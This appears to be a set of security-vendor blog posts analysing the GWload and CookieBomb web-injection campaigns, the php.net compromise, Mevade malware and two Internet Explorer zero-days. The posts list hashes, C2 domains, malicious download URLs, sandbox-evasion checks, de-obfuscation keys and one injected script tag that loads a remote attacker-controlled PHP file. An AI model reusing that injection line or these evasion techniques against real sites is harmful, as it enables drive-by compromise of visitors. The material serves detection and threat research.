‘GWload’ – The ‘Social Engineering’ Based Mass Injection Making Its Rounds

Websense® Security Labs™ ThreatSeeker® Intelligence Cloud has identified that a new mass injection campaign is making its rounds, compromising and injecting content into tens of thousands of legitimate websites. This campaign is an evolution and expansion of an existing injection campaign that Websense® Security Labs™ has been monitoring since January of this year. Our telemetry shows that, to date, at least 40,000 compromised pages have occurred on the Web, redirecting and tricking users to install rogue software.

We see parallels of the injected websites with websites that were affected by the “cookiebomb” mass injection, which was mostly associated with delivering “ransomware” payloads.  (Our blog on CookieBomb attack is here).  Let’s get back to GWload…


We’ve made three key observations about this campaign. The first is the use of a social engineering technique to lure users into downloading malicious and undesirable content.  Although most website injections in the wild redirect to exploit websites, this dominant campaign seems to shift the focus to using a social engineering technique, rather than exploits, to get unwanted content installed on victims’ machines. Our second observation is that the time of emergence of this campaign coincides with the arrest of the Blackhole Exploit Kit author ‘Paunch,’ which could explain the change in mass injection tactics, as actors move from serving exploits to social engineering. This shows that the cyber underground may have contingency plans in place to adapt and react quickly to change. Our third key observation is that the campaign employs an ‘end to end’ infrastructure of legitimate websites. These legitimate websites become compromised so that they ultimately serve rogue content. The cyber criminals deploy code to defeat ad-blockers and code that ‘locks content’ and access to the website until a certain action is complete (a technique that in the past has been used with Cost per Action CPA lead-based scams on the Facebook platform. To be clear, conducting CPAlead campaigns is not illegal; however, using CPAlead advertising methods that deceive users is illegal. The ultimate aim of the lure is to install rogue software that compensates the actors through an affiliation program. In this blog we’re going to cover the different aspects of this mass injection campaign and share relevant telemetry. 


Executive Summary 


  • Thousands of legitimate web pages are compromised in a mass injection campaign we dubbed ‘GWload’ and detected as early as the week of the 14th of October.
  • The campaign employs a social engineering technique to lure users into downloading rogue content.  Most mass injections found in the wild typically redirect to exploit websites; employing a social engineering technique instead of exploits seems to be a shift in focus to push software installations, adware, and spyware without the user’s consent.
  • The expansion and emergence of this campaign that employs social engineering techniques also coincides with the arrest of the Blackhole Exploit Kit creator ‘Paunch,’ which could explain the change in tactics of different cyber-crime actors with their mass injections, as they move from serving exploits to social engineering. This suggests that actors in the cyber underground may have contingency plans in place to adapt and react quickly to change.
  • The campaign employs an ‘end to end’ infrastructure comprised of legitimate websites under the control of cyber criminals. It was observed that injected code doesn’t lead to specially crafted payload websites but to other legitimate websites that became compromised and then are used as the serving points for rogue software installations. This effectively allows rogue content to be harder to detect and defeats detection systems that rely only on reputation.
  • Actors behind this campaign employ a set of open source tools to defeat ad-blocking technologies. The actors aim to monetize successful rogue installations through affiliate programs. The main payload script of the lure uses ‘content locking’ tactics that are very common with Cost Per Action (CPA) scams that propagate on Facebook, and the code used in this specific case shows a copyright notice from Adscend Media LLC, which is a company that was sued by Facebook for engaging in scams and fraudulent activity on the Facebook platform.


Distinct geographical locations of compromised web-servers:


Number of injected web pages spotted in the last 7 days:


The Lure 


Users who browse to a compromised injected website are immediately redirected ‘drive-by’ style to a second compromised website that (a) effectively blocks all content of the legitimate website and (b) shows them this notification: “VLC player is required for this website, click DOWNLOAD NOW”. VLC media player is a legitimate open source media player (the official page is located here). However, VLC player is also known to be abused and bundled with some non-legitimate software, and this is the case with all the “VLC media player” installations that take part in this mass injection campaign; they’re all “complemented” with a generous number of unexpected rogue installations of additional software.


The lure – how content is ‘locked’ with conditional access; this is what the user sees when browsing to an injected website (click to enlarge):


A website’s main page source code, injected with ‘GWload’ (click to enlarge):


A website’s Javascript file source code, injected with ‘GWload’ code alongside a ‘Cookiebomb’ injection (click to enlarge):


Infection & how money is made

If a user is convinced that it is necessary to download and run the file to access the website’s content, then unexpected, rogue installations of software will commence on the user’s machine. These software installations allow the actors behind this campaign to monetize infections. ‘Monetizing’ is the keyword here, because the binaries that are downloaded come from the infrastructure of a company called ‘Amonetize LTD‘ – a company with a speciality in ‘pay per install’ schemes. Basically the company compensates participants of its ‘pay per install’ programs with money. Here is the definition from the website’s FAQ section, to help make things clearer:


What is Amonetize? (Click to enlarge):


A user who runs the binary will immediately see an installation dialog box of ‘VLC player’ (see Image 1 below). So far so good: it has the ‘VLC Player’ logo. But it also has some information written in small letters that the browsing user should probably read. The small letters suggest what’s coming, but most users at this stage are eager to get access to the website (or it could be that their curiosity plays a part), and they click ‘Next’ to advance the installation of what they think is the video player. At this stage the open source package of ‘VLC player’ is downloaded from the official website, but it’s not getting installed.  The next stage asks the user to install ‘Registry Helper’ (Image 2).  There’s a decline button, and choosing to decline helps in that the app doesn’t get installed. But clicking the ‘Next’ button brings a flood of bad news (Image 3), because from that stage on, a lot of software is getting installed on the user’s machine silently, in different locations. The initial binaries that get downloaded, run, and installed are “updater.exe” files downloaded from hxxp://cdn3.anotherdownload.com/updater/Updater.exe and “sctmp.exe” from  http://downloadspot7.shoppingchip.info/sctmp.exe.



Image 1 – Looks like “VLC Player” Installation, but the small print allows for some extras:


Image 2 – “Registry Helper” opt-in: 


Image 3 – The stage where software installations that take part in the Cost Per Action (CPA) scheme are commenced:



Here is a summary of all files\applications taking part in the Cost Per Action (CPA) scheme that get installed and run on the machine:


SHA1: bce71547dec74a39cca484a3b5a2ec9c844c4575 , filename: sctmp.exe (ShoppingChip)

SHA1: d52e3715b0d1f4a43e9aff2347e6b1fc88a3b7e8 , filename: 294823_.exe (ShoppingChip)

SHA1: 2315be5c129efe4fac36850b225ca2ebeec196ae , filename: 0j.exe (ShoppingChip)

SHA1: 0b9e805077320b0ce1e6620488bd34f1c4d7827e , filename: w.dll (ShoppingChip)

SHA1: 184c60aafbb12d1023b1ce2aff4d3708607a75a1 , filename: W.x64.dll (ShoppingChip)

SHA1: 668437f834b3f4e1e2b6383936528d56c17ca3eb , filename: Updater.exe (Amonetize)

SHA1: 44541bd12d0c1454310babb38ef65579544bb7cb , filename: bundlesweetimsetup.exe (SweetIM\SweetPacks)

SHA1: c077be880adcca469cb8009f9a3f4170497fa011 , filename: spacksyahoo_717_active.exe (SweetIM\SweetPacks)

SHA1: 827ab81eb687b4fe88ac500d6dae475ba7dd2daf , filename: ExtensionUpdaterService.exe (SweetIM\SweetPacks)

SHA1: 3e1726b904874101c93b51c784917f2aedd3863c , filename: Extension32.dll (SweetIM\SweetPacks)

SHA1: ac57ebd667acf5734d3fe5c7f1982440b507bcff , filename: installerhelper.dll (SweetIM\SweetPacks)

SHA1: 2eabe4f755213666dbbbde024a5235ddde02b47f , filename: registry.dll (SweetIM\SweetPacks)

SHA1: 6c4c7be6be33413be0017bb31a78921f61b6cd3b , filenmae: sweetiesetup.exe (SweetIM\SweetPacks)

SHA1: b9fb23cbe82811b97e6c3ad0dac182b8f99c9e9d , filename: 1382915777_45645062_228_4.tmp (SweetIM\SweetPacks)

SHA1: e1606da015762918176602bf3dd696b88351535b , filename: WSSetup.exe (SweetIM\SweetPacks)

SHA1: 63ec07e905abf4f8bbf85b0b721820e4533cd81e , filename: SetXPDriverSigningPolicy.exe (SweetIM\SweetPacks)

SHA!: a7c1b35254f2c1fc56648823b59fbba6577aa4e7 , filename: Coupon_Scout_102.exe (CouponScout)

SHA1: 8c13adefc4a1726a1f12f986c7f7b77375b8a6e2 , filename: psupport.dll (Bprotector)

SHA1: 7efc16c587164083105dd52683ca453f9a64fb17 , filename: cs-browser-assistant-2-0.exe (CS Browser Assistant) 

SHA1: 2ec3760fd906e8dfe827cdbf552b8786348b1121 , filename: Wwyqza.exe (CS Browser Assistant) 

SHA1: 868bc131566a670d9a27742f1f499f2e36107a33 , filename: 44286.crx (CS Browser Assistant) 

SHA1: ee311464e5cee2ea7be63a09a7bd8aaa470243aa , filename: 44286.xpi (CS Browser Assistant) 

SHA1: 9efbf2f1d28936e18b2a17cb853e8623f192e292 , filename: CS Browser Assistant 2.0-bho.dl(CS Browser Assistant) 


Here are the Registry modifications that suggest Browser Helper Objects, services, and toolbars: 


URLSearchHook: SweetIM ToolbarURLSearchHook Class – {EEE6C35D-6118-11DC-9C72-001320C79847} – C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgHelper.dll


BHO: CrossriderApp0044286 – {11111111-1111-1111-1111-110411421186} – C:\Program Files\CS Browser Assistant 2.0\CS Browser Assistant 2.0-bho.dll


BHO: Updater By Sweetpacks Helper – {DEDAF650-12B8-48f5-A843-BBA100716106} – C:\Program Files\Updater By Sweetpacks\Extension32.dll


BHO: ShoppingChip – {EBFD7D4B-EF00-3F7D-A2C7-4C6C23DCAFAC} – C:\Program Files\ShoppingChip\W.dll


BHO: SWEETIE – {EEE6C35C-6118-11DC-9C72-001320C79847} – C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgToolbarIE.dll


Toolbar: SweetPacks Toolbar for Internet Explorer – {EEE6C35B-6118-11DC-9C72-001320C79847} – C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgToolbarIE.dll


Service: Updater By Sweetpacks – Unknown owner – C:\Program Files\Updater By Sweetpacks\ExtensionUpdaterService.exe



To summarize this section, a significant amount of unexpected and unwanted software may have found its way to the user’s machine, including: ShoppingChip, SweetIM\SweetPacks, Amonetize Updater, CouponScout, Bprotector & CS Browser Assistant.  We hope there won’t be more.



How the lure code operates, and relationship to rogue CPAlead campaigns on Facebook


The script that is loaded by an injected website with ‘GWload’ also resides on an injected website and follows a two-stage process (related source code is demonstrated in the images below). The first stage is the ‘locker page loader’ where steps are taken to prepare the browser to load the ‘content locker page’.  Among its various actions, it prepares the frame where the ‘content locker page’ is going to reside and sets a cookie on the user’s machine. At this stage, the script won’t redirect to the ‘content locker page’ and lock the website’s content if there was no referrer set to the request.  This means that the ‘content locker page’ will show and activate only if the user was referred from another website, such as a search engine result. If everything checks out at the first stage, then the ‘content locker page’ is loaded, and it blocks the website’s legitimate content from the user, permitting access only if ‘VLC Media Player’ is downloaded and installed. Digging a bit deeper and looking for references in the code section ‘gwloaded = false‘ over the web shows that it’s associated with tools that aim to evade browser-based “Ad blockers” software. In fact, the comments at the start of the script claim in plain sight that the script and its contents are the intellectual property of Adscend Media LLC. Adscend Media LLC is a company that was sued by Facebook; Facebook claimed that the company engaged in scam and fraudulent activity on the Facebook platform. A lot of the scams on Facebook employ social engineering tricks similar to this mass injection: they typically condition access to content if certain steps are executed by the user; conditions vary and may include filling out a survey or installing software. This model of on-line advertising is called “Cost Per Action” (CPA) or “Pay Per Action” (PPA), where the advertiser pays for each specified action commenced by the user.


Once the ‘content locker page’ loads, it prompts the user to download the software with several links leading to the same location at trackergeo.com. This domain acts as a statistics collector; checking the Whois data for that website shows that it was registered by a zhang jing and with email address derqe43@qq.com; commencing a reverse Whois lookup on the email address reveals more domains that have a low reputation and that were registered ~14-20 days ago:


















trackergeo.com redirects to hxxp://www.winmediaplayer.com/direct-download.html?version=, which further redirects to download the installation file at hxxp://www.askdownload.com/download.php?version=


The file downloaded named VLCMediaPlayer__3793_il256.exe (SHA1: 7e8593c36209afa8f065ac00aa3d3b40b738dc00) is the main file that starts the process of installing unwanted software, as we described in the previous section. A summary report from Websense’ sandbox ThreatScope™ show that the file tries to connect and download suspicious content from the web address idyllicdownload.com/index.php, a website registered by Amonetize LTD.


winmediaplayer.com and askdownload.com are registered by Amonetize LTD. You can notice the affiliate ID marked in bold above: 10084, this number is how Amonetize can track and associate downloads to affiliates and compensate them accordingly. If we do a reverse Whois lookup on recent domains that are owned by Amonetize LTD we spot some interesting matches:

















































































The first stage – the ‘locker page loader’:



The second stage – the ‘locker page’:






Our telemetry shows that different and diverse sets of websites are affected by this attack.  Below is a chart that shows the top 20 categories of websites that have been injected with ‘GWload”.  Leading the chart are websites that fall under the ‘Business and Economy’ category, followed by ‘Sex’ websites, ‘Web hosting’ websites, and ‘Information Technology’ websites. Closing the top five of injected websites is the ‘Travel’ websites category.


Top 20 categories of websites injected with ‘GWload’ (click to enlarge): 



Top Ten Injected Countries:





An injected website can be identified by looking for the next two keywords in the page’s source code:

1. >var gwloaded = false;< 

2. .php” type=”text/javascript”></script>


Injected code example:

<script type=”text/javascript”>var gwloaded = false;</script>

<script src=”http://brandway.home.pl/blekitna_pl/mDJkxzca.php” type=”text/javascript”></script>


ThreatSeeker detecting the insertion of malicious code to legitimate website (click to enlarge):





In this blog we described a mass injection campaign that emerged in the past two weeks and that continues to affect thousands of websites across the globe. We noticed that this mass injection uses a social engineering trick that locks legitimate websites’ content to lure potential victims to install applications that participate in Cost Per Action (CPA) advertising schemes. This change in tactics that occurred in the past two weeks coincides with the arrest of the Blackhole Exploit Kit author ‘Paunch,’ which could suggest that actors adapt to change rapidly to keep their attack going. It was also apparent that certain scripts used by actors to serve social engineering-based attack vectors are interchangeable across different attack platforms; we witnessed with ‘GWload’ that code that mostly was used in social engineering-based attacks on Facebook has now migrated and is used with mass injections.


Websense customers are protected from injected websites and the different stages of this threat with our Advanced Classification Engine – ACE.

Evolution of the CookieBomb toolkit

An ongoing, large-scale injection campaign has been raging for the
last 6 months. This campaign utilises a toolkit, dubbed CookieBomb (due
to its signature use of cookies), which is fascinating not only in its
apathy toward a particular platform, but also the code used in the
injections, and way in which it has evolved to escape and evade
traditional AV platforms and structures. This blog will:

  • describe the evolution of not only the raw code involved in these
    attacks, but also the delivery mechanisms with which users are lured to
    infected, or outright malicious, pages
  • implicitly highlight the interaction between, and quid pro quo nature of, major threat-actors within the malware ecosphere
  • describe the use of session Cookies and the etymology of the toolkit name: CookieBomb
  • outline the use of CookieBomb to drive traffic toward EK infrastructure, directly or via TDS systems
  • cover the migration from  BHEK to competing EKs in light of the BHEK author’s arrest
  • detail the point at which the campaign forked into two distinct entities

…(read more)

PHP.net compromised, serving up obfuscated content

The Websense® ThreatSeeker® Intelligence Cloud has alerted us regarding content deployed on the web developer’s web site hxxp://php.net/.

Internet users may know that Google Safe Browsing has also alerted users to a possible infection or compromise of php.net, a site currently ranked 220 on the Alexa ranking system. A member of Google’s staff has posted on a number of forums (examples here and here) to confirm that this is, in fact, a true positive, as confirmed by our telemetry. Members of the same forums quickly compared versions of the script, identifying the following code as appended to at least 4 .js scripts within the hxxp://php.net/ domain:



The following screen shot shows the decoded obfuscation:


When we look at the resulting JavaScript, we can identify a URL in the .uk TLD space:

The iFrame source was hosted on a VPS owned by hxxp://webfusion.co.uk/, which should be applauded for swiftly taking the site down, soon after this compromise came to light. Before the takedown, the URL returned one of two types of content: a basic plugin detection script, or the simple string “not ready”, as shown below:


The code was served just once per IP and was dependent upon correct Referer and UA strings.


The ultimate goal of this injection was to redirect users to the Magnitude Exploit Kit (MEK), which attempts to exploit Adobe and Java platforms, among others, in order to serve up generic Ransomware.


Websense customers were, as always, protected against this type of attack by ACE™, our Advanced Classification Engine

Of the 7 Stages of Advanced Threats, Websense offered protection at the following stages:

  • Redirection stage
  • Exploit Kits stage
  • Command and Control URLs


Update (at the time of this blog posting): The malicious code has been removed from hxxp://php.net/.

Massive Russian Cyber-criminal Campaign Targets Business Services, Manufacturing, Government, and Transportation Industries

Websense Security Labs™ researchers have discovered a widespread cybercrime campaign utilizing the Mevade malware that appears to be originating from Russia and Ukraine and primarily targeting the business services, government, manufacturing, and transportation sectors in the US, UK, Canada, and India.

In this post we analyze the malware, command and control characteristics, and attack infrastructure used in this campaign.


Executive Summary

Websense research performed on 3rd party feeds indicates that this campaign has infected hundreds of organizations and thousands of computers world-wide and appears to be used for a variety of purposes, including redirecting network traffic and click fraud, as well as search result high-jacking. However, the extensible Mevade malware provides a very capable mechanism for data theft through reverse proxying capabilities. Websense customers are protected against attacks such as this at multiple stages of the attack cycle, including attack infrastructure and C2 protocol.

  • Websense Labs researchers have observed a massive cyber campaign that appears to have originated from Russia and the Ukraine beginning around July 23, 2013, and that continues today
  • Targeted industries include: Business Services, Government, Manufacturing, and Transportation
  • Targeted countries include: USA, United Kingdom, Canada, and India (among others)
  • The malware analysis of Mevade below shows use of a reverse proxy capability (similar to Shylock), indicating a very flexible dropper that is well suited to rerouting network traffic, targeted theft of information, and facilitating lateral movement through target networks by creating a network-level backdoor
  • We have observed the command and control infrastructure, detailed below, hosting malware and exploits such as CVE-2012-4681, dating back to August 2012
  • We have observed links with this campaign’s malware (7C5091177EA375EB3D1A4C4A2BBD5EB07A4CC5CC) are associated with the large spike in Tor (Onion Router) which was presumably providing anonymity for the cyber criminals C&C servers in August 2013
  • The heavy use of attack infrastructure (C2 servers) located in Ukraine and Russia and Mevade malware links this group to a potentially well-financed cyber-crime gang operating out of Kharkov, Ukraine and Russia

Special thanks to Websense Labs Researchers Jack Rasgaitis and Gianluca Giuliani for their contributions to this report.


Targeted Industries


Targeted Locations vs. Command and Control Infrastructure



Malware Callbacks

The malware calls back with GET requests of the following example format: 


  • http://updsvc.net/updater/3ad219fe94fbcaba3687c5298358998d/2


A signature can be built with /updater/[32 random characters]/[1 or 2]



  • /updater/28d949f1d82631dac4539d5d1ac21d6c/2
  • /updater/5eafaed947ea36a0ccec58e788a77b35/2
  • /updater/389b71b07d4d376a70952a1b1c571d68/2
  • /updater/01e8d75a7a368f854bcef52136985092/2
  • /updater/660c989f210fd7027085731478ab5922/2
  • /updater/fbd1375f6a9049ad9dbd0e0a38be4a8a/2
  • /updater/5122379f40e7431638125d6ee939827c/2
  • /updater/cd9d21a004c3a578ac0da997193315be/2
  • /updater/43028ea498e6ec76f5b69d47f0ede71e/2
  • /updater/5f3f651c20e5bfd5ddab74536ddb3b7b/2
  • /updater/bae58af607a8c88c08b9843aaec0327f/2


Domains being used for command and control:


  • service-stat.com
  • updservice.net
  • autowinupd.net
  • autoavupd.net
  • service-update.net
  • full-statistic.com
  • service-statistic.com
  • stetsen.no-ip.org
  • autodbupd.net
  • automsupd.net
  • titanium.onedumb.com
  • statuswork.ddns.info
  • fullstatistic.com
  • service-statistic.com
  • autosrvupd.net
  • full-statistic.com
  • fullstatistic.com
  • service-update.net
  • storestatistic.com
  • updsvc.net
  • fullstatistic.com
  • reservestatistic.net
  • srvupd.com
  • automsupd.net
  • stotsin.ignorelist.com
  • autosrvupd.net
  • autosrvupd.net
  • reserve-statistic.com
  • autodbupd.net
  • workstat.hopto.org
  • service-statistic.com
  • full-statistic.com
  • srvupd.com
  • updsvc.net
  • automsupd.net
  • autosrvupd.net
  • assetsstatistic.com
  • assetsstatistic.com
  • assetsstatistic.com
  • srvupd.com
  • updsvc.net
  • reserve-statistic.com
  • reserve-statistic.com
  • autodbupd.net
  • fullstatistic.com
  • reservestatistic.net
  • reserve-statistic.com
  • srvupd.com
  • updsvc.net
  • fullstats-srv.net
  • stats-srv.com
  • fullstats-srv.com
  • statssrv.com
  • reserv-stats.net
  • reserv-stats.com
  • pushstatistics.com
  • stats-upd.net
  • reservstats.com
  • push-statistics.net
  • push-stats.net
  • push-stats.com
  • fullstatistic.com


Interestingly, most of the domains above are registered with the following contact email address: gmvjcxkxhs@whoisservices.cn contact info: “Whois Privacy Protection Service|Whois Agent”, which indicates a single service was used to register these domains. A quick search of our domain registration database indicates that over 7,000 domains have been registered using this service. 

The majority of Command and Control related IP addresses can be attributed back to the following ASN:


Country: RU

Registration Date: 2007-11-09

Registrar: ripencc

Owner: PIN-AS Petersburg Internet Network LLC


Malware Analysis


  • Malware sha1=7C5091177EA375EB3D1A4C4A2BBD5EB07A4CC5CC Size=369152
  • Historically seen hosted at: hxxp://service-stat.com/attachments/v4_sl.exe


Microsoft first detected this malware as Mevade.A on July 2, 2013.


Static Analysis of Malware (SHA1 7C5091177EA375EB3D1A4C4A2BBD5EB07A4CC5CC)

As you can see below, the malware is using an integrated services language based on SQL, called WQL (SQL for Windows Management Interface). Below you can see a snippet of code that queries the target system’s database to learn the security settings.



Here is the direct WQL query to the Windows Management Interface to learn more about installed AntiVirus.  



The malware authors were kind enough to leave us a list of AV engines that they were attempting to detect.



Interestingly, the malware attempts to detect the existence of the “Sandboxie” tool commonly used by researchers to analyze malware. Below is a check executed by the malware for the presence of Sandboxie DLLs.



Below, we see a direct check executed by the malware to search for Oracle/Sun VirtualBox services.



AV and Security checks complete, install the malware service…

The malware contains a “Resources” section that is used by the code as shown below.



This confirms our suspicion that the software we have analyzed so far is a loader program to install the malware service.



The obfuscated code below is used to confirm that the security checks above executed correctly.


Once the security checks have been validated and the resources section properly decoded, the loader attempts to install the malware as a service. Below is the sequence of functions offered by the installer.


Interestingly, the buffer below contains references to the “3proxy” open source proxy software that we have previously seen associated with the Shylock/Caphaw malware.



3proxy is a tiny proxy which can be installed on Windows-based systems (hxxxp://www.3proxy.ru/) .  More information about 3proxy below. 



Why Embed 3proxy in Malware?

A lightweight proxy such as 3proxy provides functionality in advanced malware to allow attackers to tunnel traffic directly through the malware and directly onto a target network. In these cases, the Proxy is configured as a reverse proxy, with the ability to tunnel through NAT (Network Address Translated) environments to create a connection to the attacker’s infrastructure and initiate a backdoor directly into the target network (in this case, using SSH over port 443). The use of reverse proxies indicates that the cyber-criminals plan to manually scan a network and move laterally towards more critical apps and information (such as databases, critical systems, source-code, and document repositories) than might exist on the original machine that has been compromised. 

Details on Shylock’s use of 3proxy:



Historical Similarities

IP addresses associated with the Command and Control domains above have been associated with hosting the Java 0-day CVE-2012-4681 in August, 2012.


Malware sample associated with the recent spike in Tor (Onion Router) traffic observed in September 2013


Zero-Day Attack for Internet Explorer (CVE-2013-3897) Goes High Profile

Websense® Security Labs™ has seen a new zero-day exploit for Internet Explorer (CVE-2013-3897) used in highly targeted, low-volume attacks in Korea, Hong Kong, and the United States, as early as September 18th, 2013. The publication of the vulnerability details (CVE-2013-3897) were shared by Microsoft in advance of today’s patch for the vulnerability that is now available for download. Websense ThreatSeeker® Intelligence Cloud was able to correlate those attacks and create a profile about targeted geographical locations where attacks began as well as targeted industries, which will be described later in this post. In addition, we found the targeted attacks that utilized the exploit for CVE-2013-3897 also included older exploits in their attacks like CVE-2012-4792 for certain targets.


Executive Summary

  • Websense ThreatSeeker Intelligence Cloud has seen a new zero-day exploit for Internet Explorer (CVE-2013-3897) used in highly targeted, low-volume attacks in Korea, Hong Kong, and the United States, as early as September 18th, 2013. 
  • Websense
    telemetry indicates that the attack campaign using the same infrastructure
    and the exploit (CVE-2012-4792) began as early as August 23rd 2013 before
    transitioning to CVE-2013-3897 in mid-September
    • A patch has been supplied by Microsoft and is available for download.
    • Microsoft took this opportunity to patch a previous vulnerability for Internet Explorer CVE-2013-3893. The patch for both vulnerabilities can be found at this link: ms13-080.
    • Our ThreatSeeker Intelligence Cloud reported that the attacks targeted primarily financial and heavy industries in Japan and Korea.
    • Our telemetry shows that the actors behind these attacks used their infrastructure to launch older exploits for Internet Explorer, such as CVE-2012-4792, which was first seen at the start of 2013.
    • Websense has protected our customers from the recent Microsoft Internet Explorer CVE-2013-3897 and CVE-2013-3893 exploits observed in the wild by using real-time analytics that have been in place for nearly three years.


    Vulnerability Details for CVE-2013-3897


    The vulnerability is caused by a “use-after-free” error when processing “CDisplayPointer” objects within mshtml.dll and generically triggered by the “onpropertychange” event handler; the vulnerability could be exploited remotely by attackers to compromise a system via a malicious web page. The specific exploit that has been seen uses heap-spray to allocate some memory that employs an ROP technique around the 0x14141414 address (as confirmed by the Microsoft Security Response Center).


    A sample of one of the specific exploit pages that has been spotted in the wild shows Javascript code that appears to target Microsoft Windows XP 32-bit with these languages: Japanese or Korean and Internet Explorer 8.



    The attacks were served by directly browsing to raw IP addresses and were spotted served by selected IP addresses in the network range of 1.234.31.x/24, which is geolocated in the Republic of Korea. The attack lure pages (starting point of the exploit chain) on that network range share the same URL patterns and they all consist of the URL structure <x.x.x.x>/mii/guy2.html.


    We also spotted that a URL with that same structure on the same network range was used to serve an older and disclosed exploit for Internet Explorer CVE-2012-4792 also in a low-volume and targeted way. Those attacks were launched at the end of August this year. Here is a snippet of the page located at hxxp:// In the case of CVE-2012-4792 in this campaign, it looks like there were no conditional checks for the operating system, browser, and language prior to serving the exploit, which means it was served to the target unconditionally.







      Looking at the broader picture and taking into account all the related attacks that we’ve seen served from the IP range 1.234.31.x/24, we found some interesting information that can shed more light on the high-level agenda held by the perpetrators in this campaign. The next pie chart shows the different industries that we saw being targeted with this campaign in the last month. The chart reveals that the interest of the perpetrators in this case is broad as they aim to compromise different type of industries that aren’t necessarily related to each other:



      Another interesting find is that this attack campaign is global; although, as described earlier, attack pages check whether the operating system’s language is either Japanese or Korean before issuing the CVE-2013-3897 exploit. It looks like the geolocation of targeted entities of Korean or Japanese origin are not just limited and based in those countries. For example, one entity that belongs to the Engineering and Construction industry has been targeted in the U.S. as one of its locations. In addition, as mentioned before, those who use CVE-2012-4792 didn’t employ any conditional checks before issuing the exploit, so that meant the potential targets in that case could be more varied. Indeed, we found that with this campaign, a government entity located in the U.S. was targeted with CVE-2012-4792.The next pie chart shows the popularity of the different targeted geographical locations of this campaign:





      Exploit Locations vs. Targets

      Websense telemetry indicates that the CVE-2013-3897 exploit has been hosted on servers in Seoul, South Korea at IP addresses, and We have seen this exploit targeting computers located in the United States, Hong Kong, and Seoul, South Korea.




      In this blog, we’ve taken a look at a targeted attack campaign that has been in circulation for the past month. It appears that the perpetrators behind this campaign target entities that belong to different industries over a selected set of geolocations, which reaffirms the notion that these kinds of campaigns operate on a global scale and focus on a variety of industries that are not necessarily related. The perpetrators behind these campaigns are innovative and employ zero-day exploit code, but it also appears that their work is customized for their targets since we witnessed older exploits that have already been patched being used in selected attacks.


      Update 10/10/2013 – Websense Researchers have confirmed that the attacks seen from this threat actor beginning August 23rd, 2013 were utilizing the CVE-2012-4792 exploit. The first observed use of CVE-2013-3897 as part of this campaign was on September 18th, 2013.

      Cybercriminals Behind CVE-2013-3893 Launched Attacks Earlier Than Previously Reported; More Widespread

      Websense Security Labs™ Websense ThreatSeeker® Intelligence Cloud has discovered that attacks utilizing the most recent Internet Explorer zero-day (CVE-2013-3893) are more prevalent than previously thought.  In this write up we shall analyze the exploit code and perform analysis on the dropped malicious file.


      Executive Summary

      • We have seen the CVE-2013-3893 exploit targeting
        Japanese firms in the financial industry hosted on a Taiwanese IP
      • Our ThreatSeeker Intelligence Cloud reported a potential victim organization in Taiwan attempting to communicate with the associated malicious command and control server as far back as July 1, 2013. These C&C communications predate the widely-reported first use of this attack infrastructure by more than six weeks, and indicates that the attacks from this threat actor are not just limited to Japan.
      • Commonalities in C&C infrastructure, domain registrations, exploit techniques and malware link this threat actor to the Operation DeputyDog and Hidden Lynx attack crew.
      • This alleged hackers-for-hire crew has committed ongoing attacks against businesses, stealing vital information, allegedly dating back to 2009.
      • Our telemetry indicates that these attacks have enough variations to indicate that different high-profile attack teams may be using the same tool sets.
      • Websense has protected our customers from the CVE-2013-3893 exploit observed in the wild using real-time analytics that have been in place for nearly three years.


        A Reminder…

        In our previous post (Up to 70% of PCs Vulnerable to Zero-Day: CVE-2013-3893) we covered a remote code execution vulnerability (CVE-2013-3893) that exists across all versions of Internet Explorer. This vulnerability exploits the way that Internet Explorer accesses an object in memory that has been deleted or not properly allocated, allowing an attacker to execute arbitrary code affecting current users with Internet Explorer.

        An exploit leveraging this vulnerability was first discovered in very targeted attacks located in Japan. First disclosed in a Wepawet security advisory on August 29th, 2013, Microsoft released a security advisory (KB2887505) providing details on the vulnerability and a Fix-It solution on September 17th, 2013. Websense researchers reviewed our third-party telemetry feeds to determine the potential attack surface and risk associated with this exploit, and determined that nearly 70% of Windows-based PCs are vulnerable. While the vulnerability can theoretically affect all versions of Internet Explorer, the exploit is targeting only users of IE8 and IE9 who are running the Windows 7 and XP operating systems.

        The Exploit

        On September 25th, 2013, at 00:39 PST, Websense real-time security analytics stopped an exploit against one of our customers (a major financial institution based in Japan) leveraging CVE-2013-3893 being hosted on a Taiwanese IP address ( The exploit was hosted at the following URL (hxxp:// It is worth noting that in addition to specific analytics designed to stop this exploit, three different Websense real-time analytics protected our customers from this threat dating back for more than 3 years.

        Below is a screenshot of the Exploit code for CVE-2013-3893 that is hosted on the Taiwanese IP ( It is interesting that the JavaScript exploit is not obfuscated and is delivered in clear-text, while the shell code and dropper discussed below are both obfuscated.



        Screen shot of the exploit’s obfuscated shell-code:



        We were quickly able to recover the XOR key (9F) and de-obfuscate the shellcode with a clear-text  attack to reveal the dropper file. While the delivery mechanisms are very similar, it is interesting to note that the URI path, IP address and image file names are different than those noted in the analysis of the Operation DeputyDog attacks, as this shell code attempts to drop “./tn/logo.jpg” from the IP address (

        Analysis of the JPG file, when XORed with 0x95 reveals an executable titled “runrun.exe” (38db830da02df9cf1e467be0d5d9216b):



        A clear-text attack on the logo.jpg file revealed that it is actually a Windows executable (when XORed with 0x95) with the following attributes:

        $ time ~/obfuscation/xray.pl logo.jpg 

        Opening file: “logo.jpg”

          94BC: [^95] “runrun.exe”

          782C: [^95] “user32.dll”

          79D6: [^95] “KERNEL32.dll”

          7A14: [^95] “ADVAPI32.dll”

            E0: [^95] “PE”

            4D: [^95] “!This program cannot be run in DOS mode.”

          776C: [^95] “Microsoft Visual C++ Runtime Library”

          7C76: [^95] “GetProcAddress”

        Network Analysis

        The runrun.exe immediately performs a DNS lookup for login.momoshop.org



        Next, runrun.exe initiates an HTTPS connection handshake to login.momoshop.org (, which is terminated by the server. For some reason, the client never sends a SYN/ACK to continue the HTTPS handshake. More on this when we finish reversing the malware. 



        Interestingly, momoshop.org was registered on March 16, 2013, by the registrant listed above. This domain is unusually old (6 months) in the context of the other C&C domains that we have seen associated with the malware and that were registered just days before the attacks.


        Telemetry Data

        Websense Labs researchers are currently confirming telemetry from the ThreatSeeker network with possibly compromised Taiwanese hosts communicating to the C&C server ( associated with malware variants (8aba4b5184072f2a50cbc5ecfe326701 and bd07926c72739bb7121cec8a2863ad87) dating back to July 1st, 2013, indicating that attacks from the threat actor identified in the Operation DeputyDog report may have started earlier than previously thought and may not be limited only to Japan.  More on this soon.



        1. We have seen the CVE-2013-3893 exploit targeting Japanese firms in the financial industry, being hosted on a Taiwanese IP address (hxxp:// as of September 25th at 00:39 PST.

